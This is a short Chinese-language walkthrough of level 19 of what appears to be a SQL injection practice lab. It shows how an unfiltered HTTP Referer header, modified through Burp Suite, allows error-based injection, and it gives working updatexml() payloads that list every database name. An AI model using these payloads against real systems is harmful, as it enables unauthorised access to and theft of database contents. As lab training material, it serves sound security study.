第19关使用POST请求提交参数,后端对用户名和密码进行了特殊字符转译,难度较大源码如下
但后面插入HTTP Referer时,并没有对参数进行过滤,我们可以从Referer入手
首先,输入正确的账号和密码,只有账号和密码都正确,才能操作Referer
然后使用代理软件(Burp Suite)拦截POST请求,修改Referer的参数,页面出现了报错信息,接下来即可使用报错注入进行脱库
1' and updatexml(1,0x7e,1) and '
获取所有数据库
1. 1' and updatexml(1,concat(0x7e,substr( 2. (select group_concat(schema_name) 3. from information_schema.schemata) 4. ,1,31)),3) and '
